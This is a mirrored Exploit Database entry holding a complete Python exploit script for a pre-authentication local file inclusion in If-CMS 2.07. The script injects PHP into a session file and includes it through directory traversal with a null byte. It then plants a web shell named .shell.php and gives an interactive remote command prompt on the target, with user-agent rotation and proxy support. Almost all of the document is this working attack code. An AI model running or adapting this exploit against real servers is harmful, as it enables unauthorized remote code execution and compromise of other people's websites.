IF-CMS 2.07 – Local File Inclusion (1)

• Exploit Database
• 101 阅读

• 作者： TecR0c
  日期： 2011-03-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/16980/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154

  #!/usr/bin/python # ~INFORMATION # Exploit Title: If-CMS 2.07 Pre-Auth Local File Inclusion 0day Exploit # Author: TecR0c # Date: 13/3/2011 # Software link: http://bit.ly/hh9ZB4 # Tested on: Linux bt # Version: 2.07 # PHP.ini Settings: gpc_magic_quotes = Off   import random,time,sys,urllib,urllib2,re,httplib,socket,base64,os,getpass from optparse import OptionParser from urlparse import urlparse,urljoin from urllib import urlopen from cookielib import CookieJar   __CONTACT__ ="TecR0c(tecr0c@tecninja.net)" __DATE__ ="13.3.2011"   usage = &apos;Example : %s http://localhost/ncms/ -p 127.0.0.1:8080&apos; % __file__ parser = OptionParser(usage=usage) parser.add_option("-p","--proxy", type="string",action="store", dest="proxy", help="HTTP Proxy <server>:<port>")   (options, args) = parser.parse_args()   if options.proxy: print &apos;[+] Using Proxy&apos;+options.proxy   # User Agents agents = ["Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)", "Internet Explorer 7 (Windows Vista); Mozilla/4.0 ", "Google Chrome 0.2.149.29 (Windows XP)", "Opera 9.25 (Windows Vista)", "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)", "Opera/8.00 (Windows NT 5.1; U; en)"] agent = random.choice(agents)   traversal = &apos;../../../../../../../../../../../..&apos; sessionLocation = &apos;/var/lib/php5/&apos;   def banner(): if os.name == "posix": os.system("clear") else: os.system("cls") header = &apos;&apos;&apos; |----------------------------------------| |Exploit: If-CMS 2.07 LFI RCE |Author: %s |Date: %s |----------------------------------------|\n &apos;&apos;&apos;%(__CONTACT__,__DATE__) for i in header: print "\b%s"%i, sys.stdout.flush() time.sleep(0.005)   def injectPayload(): webSiteUrl = url.geturl()+&apos;index.php?newlang=<?php;system(base64_decode($_REQUEST[cmd]));?>&apos; try: opener.open(webSiteUrl) except: print &apos;[-] Failed&apos;   def proxyCheck(): if options.proxy: try: h2 = httplib.HTTPConnection(options.proxy) h2.connect() print "[+] Using Proxy Server:",options.proxy except(socket.timeout): print "[-] Proxy Timed Out\n" pass sys.exit(1) except(NameError): print "[-] Proxy Not Given\n" pass sys.exit(1) except: print "[-] Proxy Failed\n" pass sys.exit(1)   def getProxy(): try: proxy_handler = urllib2.ProxyHandler({&apos;http&apos;: options.proxy}) except(socket.timeout): print "\n[-] Proxy Timed Out" sys.exit(1) return proxy_handler   cj = CookieJar() if options.proxy: opener = urllib2.build_opener(getProxy(), urllib2.HTTPCookieProcessor(cj)) else: opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) opener.addheaders = [(&apos;User-agent&apos;, agent)]   def postRequestWebShell(encodedCommand): webSiteUrl = url.geturl()+&apos;.shell.php&apos; commandToExecute = [ (&apos;cmd&apos;,encodedCommand)] cmdData = urllib.urlencode(commandToExecute) try: response = opener.open(webSiteUrl, cmdData).read() except: print &apos;[-] Failed&apos; sys.exit() return response   def writeOutShell(encodedCommand): cookieString = str(cj) cookieSearch = re.compile(r"PHPSESSID=(.*) f") session_value = cookieSearch.search(cookieString) if session_value: session_value = session_value.group(1) cj.clear() webSiteUrl = url.geturl()+&apos;index.php?cmd=&apos;+encodedCommand+&apos;&newlang=&apos;+traversal+sessionLocation+&apos;sess_&apos;+session_value+&apos;%00&apos; try: opener.open(webSiteUrl) except: print &apos;[-] Failed&apos; sys.exit()   def commandLine(): encodedCommand = "echo &apos;<?php system(base64_decode($_REQUEST[cmd]));?>&apos; > .shell.php" encodedCommand = base64.b64encode(encodedCommand) writeOutShell(encodedCommand) commandLine = (&apos;[RSHELL] %s@%s# &apos;) % (getpass.getuser(),url.netloc) while True: try: command = raw_input(commandLine) encodedCommand = base64.b64encode(command) response = postRequestWebShell(encodedCommand) print response except KeyboardInterrupt: encodedCommand = base64.b64encode(&apos;rm .shell.php&apos;) postRequestWebShell(encodedCommand) print "\n[!] Removed .shell.php\n" sys.exit()   if "__main__" == __name__: banner() try: url=urlparse(args[0]) except: parser.print_help() sys.exit() getProxy() proxyCheck() injectPayload() commandLine()